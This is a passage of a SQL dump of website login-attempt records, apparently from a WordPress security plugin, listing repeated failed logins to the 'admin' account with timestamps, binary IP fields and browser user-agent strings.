Firefox/62.0'),(4289,7016,1629614738.137402,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4290,7016,1629614738.182130,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4291,7017,1629614966.845242,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����6p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4292,7018,1629615071.625509,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(4293,7019,1629615202.591902,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��go(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4294,7020,1629615675.297054,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4295,7021,1629615907.252903,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4296,7021,1629615907.305635,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4297,7022,1629616192.222250,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;v�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(4298,7023,1629616201.872882,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4299,7024,1629616671.401369,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4300,7025,1629616925.385451,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Q֨','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4301,7026,1629617168.172733,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ʈ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4302,7027,1629617309.958475,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��T��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(4303,7028,1629617436.087217,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4304,7030,1629617931.895607,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�a','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4305,7031,1629618204.278333,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4306,7032,1629618422.241417,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4307,7033,1629618449.486782,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4308,7034,1629618695.511044,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4309,7035,1629619221.062037,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4310,7039,1629622033.278120,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4311,7041,1629623975.223858,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(4312,7041,1629623975.289804,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(4313,7043,1629625555.939488,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4314,7043,1629625555.969660,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4315,7044,1629626244.233845,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(4316,7045,1629628542.580314,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\n','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(4317,7047,1629629702.890668,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���㪽','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(4318,7048,1629630853.484442,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�S','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(4319,7051,1629633223.081878,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���츈','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4320,7052,1629634563.255715,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4321,7058,1629637484.621214,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�t2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4322,7062,1629639064.667613,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���!','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(4323,7064,1629640316.892380,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4324,7064,1629640316.926222,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4325,7065,1629640864.139809,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4326,7066,1629641845.076855,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Օg�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4327,7069,1629642605.516152,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(4328,7069,1629642605.551147,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(4329,7070,1629642976.165465,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����jQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4330,7071,1629643303.964126,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\rQ(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4331,7072,1629643646.382579,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ϔK','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4332,7073,1629643966.374122,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\ru3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4333,7074,1629644273.832246,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_nq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4334,7075,1629644641.831623,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e�8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4335,7076,1629644963.035879,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~߱','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(4336,7079,1629648507.129428,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(4337,7079,1629648507.150812,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(4338,7080,1629649690.164342,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4339,7086,1629656209.519845,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��C','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(4340,7096,1629667509.812974,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(4341,7100,1629670467.888665,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����T�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4342,7101,1629671307.939758,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;v�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(4343,7105,1629674686.871115,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���}7�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4344,7107,1629676397.708186,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(4345,7109,1629678966.682641,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(4346,7110,1629679837.954677,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�� ','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(4347,7117,1629687597.485886,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���(%�','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(4348,7125,1629695823.863600,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(4349,7127,1629696636.316758,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��j4��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(4350,7128,1629697061.016257,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4351,7129,1629697458.216669,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(4352,7130,1629697589.682098,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4353,7131,1629698228.393623,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4354,7132,1629698278.314556,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gm','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(4355,7133,1629698901.766213,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^+.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4356,7134,1629699110.436157,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@o~ ','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(4357,7135,1629699590.352803,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��o�F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4358,7136,1629699933.433948,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(4359,7137,1629700283.493178,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4360,7138,1629700761.080387,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����m','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(4361,7140,1629701593.440079,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/�=�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(4362,7142,1629702431.425968,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��:��^','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(4363,7143,1629702537.560070,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g/<,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4364,7144,1629702889.176712,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�S','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(4365,7145,1629703362.432545,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4366,7147,1629704174.929665,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%�[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4367,7148,1629704559.143736,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(4368,7150,1629705828.295694,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��n-p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4369,7151,1629706240.609609,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gm','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4370,7153,1629707082.643482,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%�\r�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4371,7156,1629708261.164132,1,'loginFailInvalidUsername','ana_dmdima',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4372,7157,1629708262.567926,1,'loginFailInvalidUsername','ana_dmdima',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4373,7158,1629708264.039706,1,'loginFailInvalidUsername','ana_dmdima',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4374,7161,1629709250.320862,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�2�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4375,7161,1629709250.344022,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�2�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4376,7164,1629711061.664560,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4377,7165,1629711321.210371,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e ��','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(4378,7167,1629712172.292686,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4\Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(4379,7168,1629713783.113736,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ՈLB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4380,7169,1629714675.809449,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4381,7170,1629714705.523930,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e ��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(4382,7172,1629715656.009210,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4383,7174,1629716625.203127,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4384,7175,1629717273.772370,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(4385,7175,1629717273.829925,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(4386,7176,1629717535.991724,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��2tb','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4387,7178,1629718553.795487,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��zrL�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4388,7179,1629719000.637253,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ո]�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(4389,7180,1629719494.560752,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4390,7184,1629721432.566097,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ů�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4391,7185,1629722372.285171,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,�7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4392,7186,1629722468.425719,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���贮','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4393,7187,1629723345.567081,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(4394,7188,1629723372.753844,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4395,7189,1629724217.687579,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��j4��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(4396,7192,1629725324.095945,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���b�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4397,7193,1629725974.262252,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����q','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(4398,7198,1629728373.601741,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4399,7199,1629729384.724528,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4400,7200,1629730415.087912,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3&P','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4401,7201,1629731453.904783,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4402,7202,1629731469.419438,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6&I�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(4403,7203,1629732486.748709,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4404,7205,1629733553.755146,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����`�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4405,7212,1629747596.430072,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3Kȷ','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(4406,7214,1629750628.366393,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%�\r�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4407,7218,1629757859.973035,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.�yo','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(4408,7219,1629759288.271436,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(4409,7223,1629765568.077936,1,'loginFailInvalidUsername','wheretos',0,'\0\0\0\0\0\0\0\0\0\0���w�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4410,7224,1629765568.518190,1,'loginFailInvalidUsername','wheretos',0,'\0\0\0\0\0\0\0\0\0\0���w�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 